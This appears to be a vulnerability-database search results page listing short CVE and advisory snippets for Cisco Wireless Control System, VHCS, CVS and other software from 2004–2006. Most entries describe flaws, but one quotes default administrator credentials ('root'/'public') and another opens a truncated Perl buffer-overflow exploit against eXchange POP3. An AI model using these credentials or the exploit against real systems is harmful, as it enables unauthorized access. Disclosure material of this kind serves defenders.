1577 matches found
CVE-2006-3287
Cisco Wireless Control System WCS for Linux and Windows 4.01 and earlier uses a default administrator username "root" and password "public," which allows remote attackers to gain access aka bug CSCse21391...
CVE-2006-3289
CVE-2006-3289 denotes a cross-site scripting (XSS) vulnerability in the login page of Cisco Wireless Control System (WCS) HTTP interface for Linux and Windows, affected in versions prior to 3.2(51). The issue allows remote attackers to inject arbitrary web script or HTML via vectors involving a m...
CVE-2006-3285
The internal database in Cisco Wireless Control System WCS for Linux and Windows before 3.251 uses an undocumented, hard-coded username and password, which allows remote authenticated users to read, and possibly modify, sensitive configuration data aka bugs CSCsd15955...
Multiple Vulnerabilities in Wireless Control System
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES TH...
[Full-disclosure] Cisco Security Advisory: Multiple Vulnerabilities in Wireless Control System
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Wireless Control System Advisory ID: cisco-sa-20060628-wcs http://www.cisco.com/warp/public/707/cisco-sa-20060628-wcs.shtml Revision 1.0 For Public Release 2006 June 28 1600 UTC GMT -...
Virtual Hosting Control System 2.4.7.1 - Server_day_stats.php Multiple Cross-Site Scripting Vulnerabilities
Virtual Hosting Control System 2.4.7.1 - Serverdaystats.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/17790/info Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitiz...
VHCS --- Virtual Hosting Control System Cross Site Scripting
---------------------------------------------------------- Aria-Security.net Advisory Discovered by: O.U.T.L.A.W www.Aria-security.net Gr33t to: A.u.r.a & R@1D3N & Smok3r ----------------------------------------------------------- Software: VHCS Link: http://www.vhcs.net Attack method: Cross Site...
Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/17790/info Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the...
Default credentials
changepassword.php in Virtual Hosting Control System VHCS 2.4.7.1 and earlier does not verify the old password when a user changes the password, which may allow remote attackers to gain unauthorized access...
CVE-2006-0685
The CVE-2006-0685 issue affects VHCS (Virtual Hosting Control System) up to version 2.4.7.1, where the check_login function in login.php does not exit on failed authentication. This enables a remote attacker to bypass authentication and gain unauthorized access to VHCS application scripts. The co...
Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password
source: https://www.securityfocus.com/bid/16600/info Virtual Hosting Control System VHCS is prone to multiple input and access vulnerabilities. VHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative acces...
eXchange POP3 5.0.050203 - RPCT TO Remote Buffer Overflow
eXchange POP3 5.0.050203 - RPCT TO Remote Buffer Overflow !/usr/bin/perl -w for educational purposes only . use IO::Socket; if $ARGV0 print "\n write the target IP!! \n\n"; exit; $buffer2 = "\x90"x1999999; $mailf= "mail"; $rcptt ="rcpt to:"; $buffer = "\x41"x4100; $ret = "\x80\x1d\xdc\x02";...
CVE-2005-3902
VHCS (Virtual Hosting Control System) versions 2.2.0 through 2.4.6.2 are affected by a cross-site scripting (XSS) vulnerability in gui/errordocs/index.php. Attackers can inject arbitrary script or HTML via query strings that are reflected in an error message. The advisory entries (NVD CVE-2005-39...
Virtual Hosting Control System 2.2/2.4 - Error Message Cross-Site Scripting
source: https://www.securityfocus.com/bid/15538/info Virtual Hosting Control System is prone to cross-site scripting attacks. The vulnerability arises when error messages are rendered and could let an attacker inject hostile HTML and script code into the browser session of another user in the...
MCCS Multi Computer Control System DoS
DoS on internal UDP-based control protocol parsing...
CVS: Multiple vulnerabilities
Background CVS Concurrent Versions System is an open-source network-transparent version control system. It contains both a client utility and a server. Description Alen Zukich has discovered several serious security issues in CVS, including at least one buffer overflow CAN-2005-0753, memory leaks...
[Full-Disclosure] Kernelpanik Labs Digest 2005-1
Hi and happy new year. This is a email digest with security fails recently published by Kernelpanik Labs http://www.kernelpanik.org Apache suEXEC Bypass -------------------- Small document about how bypass isolating procedures, i.e. suEXEC, in Apache WebServer. English document:...
DEBIAN-CVE-2004-0778
CVS 1.11.x before 1.11.17, and 1.12.x before 1.12.9, allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned...
RHEL 2.1 / 3 : cvs (RHSA-2004:153)
Updated cvs packages that fix a client vulnerability that could be exploited by a malicious server are now available. Updated Apr 19 2004 The description text has been updated to include CVE-2004-0405 which was also fixed but not mentioned when this advisory was first released. There has been no...
security flaw
CVS 1.12.x through 1.12.8, and 1.11.x through 1.11.16, does not properly handle malformed "Entry" lines, which prevents a NULL terminator from being used and may lead to a denial of service crash, modification of critical program data, or arbitrary code execution...